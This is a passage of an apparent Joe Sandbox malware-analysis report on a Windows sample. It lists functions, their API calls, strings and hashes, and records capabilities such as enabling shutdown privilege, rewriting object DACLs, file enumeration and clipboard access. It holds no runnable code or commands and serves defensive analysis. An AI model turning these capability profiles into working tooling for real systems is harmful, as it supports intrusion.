                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                                                                          • __swprintf.LIBCMT ref: 004789D3
                                                                          • __swprintf.LIBCMT ref: 00478A1D
                                                                          • __swprintf.LIBCMT ref: 00478A4B
                                                                          • __swprintf.LIBCMT ref: 00478A79
                                                                            • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                                                                            • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                                                                          • __swprintf.LIBCMT ref: 00478AA7
                                                                          • __swprintf.LIBCMT ref: 00478AD5
                                                                          • __swprintf.LIBCMT ref: 00478B03
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                                                                          • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                          • API String ID: 999945258-2428617273
                                                                          • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                                          • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                                                                          • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                                          • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                                                                          Function 004033C0 Relevance: 26.6, APIs: 11, Strings: 4, Instructions: 359COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                          • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                          • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                          • __wsplitpath.LIBCMT ref: 00403492
                                                                            • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                          • _wcscpy.LIBCMT ref: 004034A7
                                                                          • _wcscat.LIBCMT ref: 004034BC
                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                            • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                            • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                                                            • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                                                                          • _wcscpy.LIBCMT ref: 004035A0
                                                                          • _wcslen.LIBCMT ref: 00403623
                                                                          • _wcslen.LIBCMT ref: 0040367D
                                                                          Strings
                                                                          • _, xrefs: 0040371C
                                                                          • Error opening the file, xrefs: 00428231
                                                                          • Unterminated string, xrefs: 00428348
                                                                          • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                                                                          • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                                          • API String ID: 3393021363-188983378
                                                                          • Opcode ID: ce77724faf1e7fbc9fcf9b1a922f2907e035de924d79ec5656a8af7ae9668c55
                                                                          • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                                                                          • Opcode Fuzzy Hash: ce77724faf1e7fbc9fcf9b1a922f2907e035de924d79ec5656a8af7ae9668c55
                                                                          • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                                                                          Function 00431A86 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 139fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                                                                          • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                                                                          • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                                                                          • FindClose.KERNEL32(00000000), ref: 00431B20
                                                                          • FindClose.KERNEL32(00000000), ref: 00431B34
                                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                                                                          • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                                                                          • FindClose.KERNEL32(00000000), ref: 00431BCD
                                                                          • FindClose.KERNEL32(00000000), ref: 00431BDB
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                          • String ID: *.*
                                                                          • API String ID: 1409584000-438819550
                                                                          • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                                          • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                                                                          • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                                          • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                                                                          Function 00431BE8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 116COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                                                                          • __swprintf.LIBCMT ref: 00431C2E
                                                                          • _wcslen.LIBCMT ref: 00431C3A
                                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                                                                          • String ID: :$\$\??\%s
                                                                          • API String ID: 2192556992-3457252023
                                                                          • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                                          • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                                                                          • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                                          • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                                                                          Function 004720DB Relevance: 21.4, APIs: 11, Strings: 1, Instructions: 377timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetLocalTime.KERNEL32(?), ref: 004722A2
                                                                          • __swprintf.LIBCMT ref: 004722B9
                                                                          • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                                                                          • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                                                                          • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                                                                          • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                                                                          • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                                                                          • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                                                                          • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                                                                          • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                                                                          • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: FolderPath$LocalTime__swprintf
                                                                          • String ID: %.3d
                                                                          • API String ID: 3337348382-986655627
                                                                          • Opcode ID: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                                          • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                                                                          • Opcode Fuzzy Hash: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                                          • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                                                                          Function 00442886 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 135fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                                                                          • FindClose.KERNEL32(00000000), ref: 0044291C
                                                                          • FindClose.KERNEL32(00000000), ref: 00442930
                                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                                                                          • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                                                                          • FindClose.KERNEL32(00000000), ref: 004429D4
                                                                            • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                                                                          • FindClose.KERNEL32(00000000), ref: 004429E2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                          • String ID: *.*
                                                                          • API String ID: 2640511053-438819550
                                                                          • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                                          • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                                                                          • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                                          • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                                                                          Function 004333BE Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 86shutdownCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                                                                          • GetLastError.KERNEL32 ref: 00433414
                                                                          • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                                                                          • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                                                                          • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                                          • String ID: SeShutdownPrivilege
                                                                          • API String ID: 2938487562-3733053543
                                                                          • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                                          • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                                                                          • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                                          • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                                                                          Function 00446124 Relevance: 16.7, APIs: 11, Instructions: 182COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                                                            • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                                                                            • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                                                            • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                                                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                                                                          • GetLengthSid.ADVAPI32(?), ref: 004461D0
                                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                                                                          • GetLengthSid.ADVAPI32(?), ref: 00446241
                                                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                                                                          • CopySid.ADVAPI32(00000000), ref: 00446271
                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                                                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                          • String ID:
                                                                          • API String ID: 1255039815-0
                                                                          • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                                          • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                                                                          • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                                          • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                                                                          Function 0043305F Relevance: 16.6, APIs: 11, Instructions: 122COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __swprintf.LIBCMT ref: 00433073
                                                                          • __swprintf.LIBCMT ref: 00433085
                                                                          • __wcsicoll.LIBCMT ref: 00433092
                                                                          • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                                                                          • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                                                                          • LockResource.KERNEL32(00000000), ref: 004330CA
                                                                          • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                                                                          • LoadResource.KERNEL32(?,00000000), ref: 00433105
                                                                          • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                                                                          • LockResource.KERNEL32(?), ref: 00433120
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                                                                          • String ID:
                                                                          • API String ID: 1158019794-0
                                                                          • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                                          • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                                                                          • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                                          • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                                                                          Function 0045A10F Relevance: 16.6, APIs: 11, Instructions: 120clipboardmemoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                          • String ID:
                                                                          • API String ID: 1737998785-0
                                                                          • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                                          • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                                                                          • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                                          • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                                                                          Function 0045D619 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 107COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                                                                          • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                                                                          • GetLastError.KERNEL32 ref: 0045D6BF
                                                                          • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Error$Mode$DiskFreeLastSpace
                                                                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                          • API String ID: 4194297153-14809454
                                                                          • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                          • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                                                                          • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                          • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                                                                          Function 0044EB59 Relevance: 12.9, APIs: 3, Strings: 4, Instructions: 645COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
